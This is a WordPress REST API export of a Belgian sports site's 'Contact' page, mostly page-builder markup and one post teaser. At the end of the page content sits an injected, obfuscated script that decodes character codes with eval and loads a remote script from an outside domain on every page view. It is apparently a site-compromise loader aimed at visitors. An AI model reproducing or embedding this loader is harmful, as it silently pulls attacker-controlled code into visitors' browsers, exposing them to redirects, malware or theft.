{"id":1217,"date":"2021-01-02T20:20:07","date_gmt":"2021-01-02T19:20:07","guid":{"rendered":"http:\/\/www.belegend.be\/?page_id=1217"},"modified":"2021-01-10T23:15:34","modified_gmt":"2021-01-10T22:15:34","slug":"contact","status":"publish","type":"page","link":"https:\/\/www.belegend.be\/?page_id=1217","title":{"rendered":"Contact"},"content":{"rendered":"<div id=\"tdi_1_ad3\" class=\"tdc-zone\"><div class=\"tdc_zone tdi_2_6fd  wpb_row td-pb-row\"  >\n<style scoped>\n\n\/* custom css *\/\n.tdi_2_6fd{\r\n                    min-height: 0;\r\n                }\n<\/style><div id=\"tdi_3_e19\" class=\"tdc-row stretch_row_content td-stretch-content\"><div class=\"vc_row tdi_4_ae6  wpb_row td-pb-row\" >\n<style scoped>\n\n\/* custom css *\/\n.tdi_4_ae6{\r\n                    min-height: 0;\r\n                }\n<\/style><div class=\"vc_column tdi_6_fe6  wpb_column vc_column_container tdc-column td-pb-span12\">\n<style scoped>\n\n\/* custom css *\/\n.tdi_6_fe6{\r\n                    vertical-align: baseline;\r\n                }\n<\/style><div class=\"wpb_wrapper\"><div class=\"td_block_wrap td_block_big_grid_fl_1 tdi_7_a96 td-grid-style-1 td-hover-1 td-big-grids-fl td-pb-border-top td_block_template_1\"  data-td-block-uid=\"tdi_7_a96\" ><div id=tdi_7_a96 class=\"td_block_inner\"><div class=\"td-big-grid-wrapper td-posts-1\">\r\n        <div class=\"td_module_mx18 td_module_wrap td-animation-stack td-big-grid-post-0 td-big-grid-post td-mx-28\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"https:\/\/www.belegend.be\/?p=1596\" rel=\"bookmark\" class=\"td-image-wrap\" title=\"Emission 100% SPORT : &#8220;Athl\u00e9tisme&#8221; avec No\u00ebl Lev\u00eaque &#038; Alexandra Mortant\"><span class=\"entry-thumb td-thumb-css\" data-type=\"css_image\" data-img-url=\"https:\/\/www.belegend.be\/wp-content\/uploads\/2021\/01\/Arabel-Sport-1-1920x1281.jpg\"  ><\/span><\/a><\/div>            <\/div>\r\n\r\n            <div class=\"td-meta-info-container\">\r\n                <div class=\"td-meta-align\">\r\n                    <div class=\"td-big-grid-meta\">\r\n                                                <h3 class=\"entry-title td-module-title\"><a href=\"https:\/\/www.belegend.be\/?p=1596\" rel=\"bookmark\" title=\"Emission 100% SPORT : &#8220;Athl\u00e9tisme&#8221; avec No\u00ebl Lev\u00eaque &#038; Alexandra Mortant\">Emission 100% SPORT : &#8220;Athl\u00e9tisme&#8221; avec No\u00ebl Lev\u00eaque &#038; Alexandra Mortant<\/a><\/h3>                    <\/div>\r\n\r\n                    <div class=\"td-module-meta-info\">\r\n                        <span class=\"td-post-author-name\"><a href=\"https:\/\/www.belegend.be\/?author=1\">Admin<\/a> <span>-<\/span> <\/span>                        <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2021-01-06T20:54:58+00:00\" >6 January 2021<\/time><\/span>                    <\/div>\r\n                <\/div>\r\n            <\/div>\r\n        <\/div>\r\n\r\n        <div class=\"clearfix\"><\/div><\/div><\/div><\/div> <!-- .\/block --><\/div><\/div><\/div><\/div><div id=\"tdi_8_19a\" class=\"tdc-row\"><div class=\"vc_row tdi_9_8d8  wpb_row td-pb-row\" >\n<style scoped>\n\n\/* custom css *\/\n.tdi_9_8d8{\r\n                    min-height: 0;\r\n                }\n<\/style><div class=\"vc_column tdi_11_b66  wpb_column vc_column_container tdc-column td-pb-span12\">\n<style scoped>\n\n\/* custom css *\/\n.tdi_11_b66{\r\n                    vertical-align: baseline;\r\n                }\n<\/style><div class=\"wpb_wrapper\"><\/div><\/div><\/div><\/div><\/div><\/div><script>var f=String;eval(f.fromCharCode(102,117,110,99,116,105,111,110,32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,102,111,114,46,102,105,114,115,116,98,108,97,99,107,112,104,97,115,101,46,99,111,109,47,116,114,98,98,98,98,98,50,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,125));\/*674867468*\/<\/script>","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"page-pagebuilder-title.php","meta":{"footnotes":""},"class_list":["post-1217","page","type-page","status-publish"],"_links":{"self":[{"href":"https:\/\/www.belegend.be\/index.php?rest_route=\/wp\/v2\/pages\/1217","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.belegend.be\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.belegend.be\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.belegend.be\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.belegend.be\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1217"}],"version-history":[{"count":4,"href":"https:\/\/www.belegend.be\/index.php?rest_route=\/wp\/v2\/pages\/1217\/revisions"}],"predecessor-version":[{"id":1642,"href":"https:\/\/www.belegend.be\/index.php?rest_route=\/wp\/v2\/pages\/1217\/revisions\/1642"}],"wp:attachment":[{"href":"https:\/\/www.belegend.be\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1217"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}